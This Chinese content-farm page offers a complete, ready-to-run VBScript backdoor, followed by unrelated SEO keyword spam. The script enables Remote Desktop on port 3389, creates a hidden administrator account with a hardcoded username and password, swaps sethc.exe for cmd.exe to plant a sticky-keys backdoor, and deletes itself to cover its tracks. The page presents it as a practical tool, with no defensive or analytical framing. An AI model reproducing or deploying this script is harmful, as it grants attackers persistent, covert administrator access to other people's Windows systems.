千家信息网

请输入关键字词

热门搜索排行

最新搜索排行

导航: 首页 > 开发技术 >

如何使用vbs实现可自删除、开启3389创建用户粘滞键后门

发表于:2025-02-12 作者:千家信息网编辑
千家信息网最后更新 2025年02月12日,这篇文章给大家分享的是有关如何使用vbs实现可自删除、开启3389创建用户粘滞键后门的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。on error resume next
千家信息网最后更新 2025年02月12日如何使用vbs实现可自删除、开启3389创建用户粘滞键后门

这篇文章给大家分享的是有关如何使用vbs实现可自删除、开启3389创建用户粘滞键后门的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。

on error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = "." Set StdOut = WScript.StdOut Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_ strComputer & "\root\default:StdRegProv") strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server" strValueName = "fDenyTSConnections" dwValue = 0 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" strValueName = "PortNumber" dwValue = 3389 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" strValueName = "PortNumber" dwValue = 3389 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue on error resume next dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="wykgif":password="wykgif123456":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath On Error Resume Next Dim obj, success Set obj = CreateObject("WScript.Shell") success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

感谢各位的阅读!关于"如何使用vbs实现可自删除、开启3389创建用户粘滞键后门"这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,让大家可以学到更多知识,如果觉得文章不错,可以把它分享出去让更多的人看到吧!

很赞哦!
后门 用户 内容 更多 篇文章 不错 实用 文章 看吧 知识 参考 帮助 有关 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 数据库引用公式 qq群机器人服务器怎么弄 申万宏源证券软件开发 共守网络安全手抄报内容 高校网络安全吗 万方数据库对大学生的作用 软件开发员工激励方案 计算机网络技术和支付宝 组网服务器 kabat数据库 小学生网络安全知识宣传书签 上海网络安全专家名单 为什么服务器安全加固 ios 数据库和文件的区别 旅游软件开发商业企划书 使用数据库的程序有哪些 数据库如何建立视图 批量插入数据库记录 会考网络技术基础考什么 湖湘杯网络安全大赛真题 盛世芳华没有倾国倾城服务器 刺客信条起源服务器排名 虚拟机架设传奇服务器端教学 服务器挂京豆黑号吗 软件开发员工激励方案 软件开发平台成功上线 胶州商城软件开发哪家好 中兴新思教育ip网络技术 u点家庭服务器管理 水利局网络安全工作责任制

相关文章

0